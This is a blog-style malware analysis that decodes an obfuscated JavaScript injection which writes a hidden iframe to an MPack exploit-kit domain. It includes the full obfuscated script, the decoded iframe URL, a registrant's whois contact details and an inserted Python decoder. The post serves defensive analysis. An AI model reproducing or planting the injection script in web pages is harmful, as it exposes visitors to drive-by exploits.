Mpack Decode Requests
I've seen quite a rise in JavaScript decoding questions on different mailing lists. This evening one from DShield was waiting in my inbox.
Turns out Dan needed to figure out what this code does:
<script language='JavaScript'>
function nbsp() {
var t,o,l,i,j;
var s='';
s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';
s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';
s=s+'062032';
t='';l=s.length;i=0;
while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}
if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}
nbsp();
</script><!-- c4 -->
I'm sure the Internet Storm Center (ISC) handlers get hundreds of requests like this every month. Using methods like those listed here: http://handlers.sans.org/dwesemann/decode/ I was able to turn that code into human-readable form:
(Spaces added to protect from accidental clicks)
</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x /index.php" width=3 height=3 style="display:none"></IFRAME>
The leading HTML closing tags are there to evade decoding techniques like the one Tom Liston described here: http://isc.sans.org/diary.html?storyid=2268
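As an added example (not from the original post), here is a stand-alone Python decoder that replays the script's arithmetic on the digit literals instead of letting a browser execute the JavaScript, so the leading </textarea> in the output has nothing to break out of. The sample script is the post's snippet with its wrapped string literals re-joined; the function names and regexes are my own.

```python
import re

# Constructed sample: the post's obfuscated script with its wrapped string
# literals re-joined so the decoder sees each literal as one token.
SAMPLE_SCRIPT = (
    "<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';"
    "s+='060047116101120116097116101097062060047116101120116097114101097062';"
    "s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';"
    "s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';"
    "s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';"
    "s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}"
    "if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));"
    "document.write(String.fromCharCode(t));t='';}}nbsp();</script>"
)

# Matches the two forms the script uses to grow s: s+='digits' and s=s+'digits'.
LITERAL_RE = re.compile(r"s\s*(?:\+=|=\s*s\s*\+)\s*'(\d+)'")


def extract_digits(script: str) -> str:
    """Collect every digit literal appended to s, in source order."""
    return "".join(LITERAL_RE.findall(script))


def decode(digits: str) -> str:
    """Replay the decoder's arithmetic in Python rather than running the JavaScript.

    In the original, unescape(0xBF) is the string "191" and
    -(unescape(0x08)+unescape(0x30)) is -("8"+"48") = -848, so `t-=-(...)`
    adds 848 to any 3-digit code above 191. No code in this sample exceeds
    191, so that branch is dead here, but it is kept for fidelity.
    """
    chars = []
    # Consume whole 3-digit groups; a trailing partial group is dropped.
    for k in range(0, len(digits) - len(digits) % 3, 3):
        code = int(digits[k:k + 3])
        if code - 191 > 0:
            code += 848
        chars.append(chr(code))
    return "".join(chars)


def iframe_sources(html: str) -> list:
    """Pull the src of every IFRAME from decoded markup, for blocking or pivoting."""
    return re.findall(r'<iframe\b[^>]*\bsrc\s*=\s*"([^"]*)"', html, re.IGNORECASE)


if __name__ == "__main__":
    decoded = decode(extract_digits(SAMPLE_SCRIPT))
    print(repr(decoded))
    print(iframe_sources(decoded))
```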
marcobernardoni.com resolves to an IP address in Hong Kong, and the index page referenced above serves an MPack JavaScript that attempts several exploits in order to push file.php. Of course, it is a Windows PE binary, though it seems to be broken.
Domain Name: MARCOBERNARDONI.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.35.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: clientTransferProhibited
Updated Date: 08-jul-2007
Creation Date: 28-may-2007
Expiration Date: 28-may-2008
Registrant:
FuzioN FuzioN fuzka@bk.ru +7.9015371916
FuzioN inc
/dev/null
Moskow,babruysk,RU 117625
Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
A RECORD: 58.65.234.161
Protect yourself: turn off JavaScript completely, or only allow it for certain sites using the Firefox NoScript extension, and keep your application patches up to date!
Labels: Dshield, Firefox, Iframes, ISC, NOSCRIPT, xored javascript
